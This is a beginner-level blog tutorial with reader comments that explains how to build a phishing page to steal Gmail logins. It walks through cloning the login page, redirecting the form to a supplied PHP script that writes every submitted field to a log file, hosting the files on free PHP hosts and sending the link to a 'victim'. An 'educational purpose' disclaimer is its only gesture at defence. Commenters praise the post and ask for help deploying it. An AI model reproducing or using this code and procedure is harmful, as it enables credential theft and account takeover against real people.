i found many of people who wants to make der own phisher ,so i m writing this small tut. on phishing setup of any webpage .although i have posted so many phishing posts but the phisher is already made by me for ur ease .
lets move on to tutorial,
Actually this is a very basic tutorial for only those who r at very initial stage of account hacking.
this tutorial is only for educational purpose.
Labels:
email hacking,
FB hackz,
Tricks
lets move on to tutorial,
1. First open the website in a browser for which you want to create a phishing page . Now right click in an empty space and select view source , copy all the contents to a note pad and save it as something.html
example :gmail.html
2. Now open gmail.html (something.html) in a notepad .Now search[press:ctrl+f] for the string
"action = https.." and change the address to login.php and save it
"action = https.." and change the address to login.php and save it
3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php
<?php
header ('Location: http://gmail.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note :- By default the victim will be redirected to gmail.com once he clicks login ,If you want you can change the address you can do it by changing the http://.gmail.com to any address you desire
4. Now we have to create a empty log file for this Open a notepad and save the empty file as log.txt.
5. Now create an account in Free web hosting sites, which supports php like , my3gb.com,T35.com or 000webhost.com
6. Now upload all the three files which we created gmail.html , login.php ,log.txt and change the file permissions for log.txt to 777
7. Now send the gmail.html link to the victim , once he enters the information and logins in , every thing will be stored in log.txt ,you can open log.txt to see all the login details
Actually this is a very basic tutorial for only those who r at very initial stage of account hacking.
this tutorial is only for educational purpose.
Responses
6 Respones to "How to setup your own phisher/fake login page?[noobs friendly]"
nice...bro///
frm -Shubhankar
June 15, 2011 at 8:25 AM
thnxxx buddy...keep visiting nd follow this blog with facebook netwrk blogging.!!
June 16, 2011 at 2:44 AM
osom work bro ..... u really rocking ..... thanx a lot !!
June 16, 2011 at 7:20 AM
ur welcum brooo.....keeep visiting...:)..!!!
June 16, 2011 at 8:43 AM
man it says bad gateway 502...help
December 21, 2011 at 1:19 AM
How to send the gmail.html link..?
Plz Help
March 5, 2015 at 11:25 PM
Post a Comment